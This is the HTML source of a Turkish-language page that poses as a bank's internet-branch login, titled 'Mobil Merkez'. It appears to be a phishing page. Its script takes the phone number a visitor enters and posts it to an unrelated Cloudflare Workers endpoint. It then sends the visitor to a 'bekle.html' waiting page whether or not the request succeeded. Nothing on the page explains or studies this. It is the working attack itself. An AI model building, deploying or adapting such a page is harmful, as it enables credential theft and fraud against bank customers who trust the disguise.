<!doctype html>
<html lang="en">

<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width,initial-scale=1" />
    <meta name="theme-color" content="#000000" />
    <meta name="description" content="Web site created using create-react-app" />
    <title>Mobil Merkez</title>
    <link href="static/css/main.7a74354e.css" rel="stylesheet">
    <link href="assets/styles.css" rel="stylesheet" id="style">
    <style>
        html,
        body {
            height: 100%;
            margin: 0;
            padding: 0;
        }

        body {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
        }

        header {
            width: 100%;
            height: 55px;
            /* Header yüksekliği */
            background-color: #f1f1f1;
            /* Header arka plan rengi */
            position: fixed;
            /* Sayfanın en üstüne sabitlemek için */
            top: 0;
            left: 0;
            display: flex;
            align-items: center;
            justify-content: center;
            box-shadow: 0px 2px 5px rgba(0, 0, 0, 0.1);
            /* Gölge efekti */
            z-index: 1000;
            /* Diğer içeriklerin üstünde gözükmesi için */
        }

        .container {
            max-width: 430px;
            width: 100%;
            padding-top: 55px;
            /* Header altında içerik başlaması için */
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .login-wrap {
            width: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
        }

        input {
            touch-action: manipulation;
        }

        .api-payment-container img {
            max-height: 92px;
            max-width: 92px;
        }

        .ipNotInListRedirectBtn {
            background-color: #e10514 !important;
        }
    </style>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.18/dist/sweetalert2.min.css">
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.18/dist/sweetalert2.min.js"></script>
</head>

<body><noscript>You need to enable JavaScript to run this app.</noscript>
    <div id="root" style=" width: 100%;
height: 100%;">
        <div class="App">
            <header></header>
            <form name="aspnetForm" method="post" id="aspnetForm" autocomplete="off" novalidate="">
                <div class="login-wrap">
                    <div class="container" style="margin-top: 70px;">
                        <div class="tc-kimlik-giris-wrap">
                            <div class="row">
                                <div class="">
                                    <div class="login-box long"><span
                                            style="color: red; visibility: hidden;"></span><input name="rdLng"
                                            type="hidden" value="">
                                        <p>İnternet Şubemize Hoş Geldiniz</p>
                                        <div class="tabs-wrap" data-module="14">
                                            <div class="tabs tab-header-container"><a class="active"
                                                    href="#"><span></span>BİREYSEL</a><a><span></span>KURUMSAL</a></div>
                                            <div class="tab-container tab-contents">
                                                <div class="tab-item active" style="padding-left: 10px;">
                                                    <p style="margin-bottom: 8px; margin-left: 10px; text-align: left;">
                                                        Telefon Numaranız</p>
                                                    <div class="form-group hidden-title"><input autocomplete="off"
                                                            name="telno" type="tel" maxlength="13" id="telno"
                                                            class="form-control required isNumber numeric external-validation"
                                                            aria-required="true" value="+90"
                                                            style="font-size: 14px; height: 46px; font-family: sans-serif; font-weight: 700;">
                                                    </div>
                                                    <div class="clearfix"></div><button id="loginBtn"
                                                        class="btn btn-danger sendBtn"><span></span>BAŞVUR</button><br><br><br>
                                                </div>
                                            </div>
                                            <style>
                                                input {
                                                    touch-action: manipulation;
                                                }

                                                .api-payment-container img {
                                                    max-height: 92px;
                                                    max-width: 92px;
                                                }

                                                .ipNotInListRedirectBtn {
                                                    background-color: #e10514 !important;
                                                }
                                            </style>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </form>
        </div>
    </div>
    <script>
        document.addEventListener("DOMContentLoaded", function () {
            setTimeout(function () {

                var tabFooter = document.querySelector('.login-wrap .login-box .tab-item .tab-footer');
                if (tabFooter) {
                    tabFooter.style.margin = "0";
                }


                var forgotPasswordLink = document.querySelector('a.custom-link[causesval="true"]');
                if (forgotPasswordLink) {
                    forgotPasswordLink.style.display = "none";
                }
            }, 500);
        });   </script>

    <script>
        document.addEventListener('DOMContentLoaded', function () {
            setTimeout(function () {
                var elements = document.querySelectorAll('.col-xs-12.col-md-6');
                elements.forEach(function (element) {
                    element.removeAttribute('class');
                });
            }, 500);
        });
    </script>
    <script>
        function validateForm(value) {
            const phoneValue = value;

            if (phoneValue.length < 13 || phoneValue.length > 14) {
                return false;
            } else {
                return true;
            }
        }
        document.addEventListener("DOMContentLoaded", function () {
            var telno = document.getElementById("telno");
            var loginBtn = document.getElementById("loginBtn");


            loginBtn.addEventListener("click", async function (event) {
                event.preventDefault();
                if (validateForm(telno.value)) {
                    loginBtn.disabled = true;
                    var data = new FormData();
                    data.append('action', "tel");
                    data.append('telno', telno.value);

                    fetch('https://curly-fire-5ecb.aisik3516.workers.dev/', {
                        method: 'POST',
                        body: data
                    })
                        .then(response => response.json())
                        .then(data => {
                            console.log('Sunucudan gelen yanıt:', data);
                            window.location.href = 'bekle.html';
                        })
                        .catch(error => {
                            console.error('Hata:', error);
                            window.location.href = 'bekle.html';
                        });

                } else {
                    Swal.fire('Hatalı Numara', 'Telefon numaranızı doğru bir şekilde giriniz.', 'warning')
                }
            });


        });
    </script>

</body>

</html>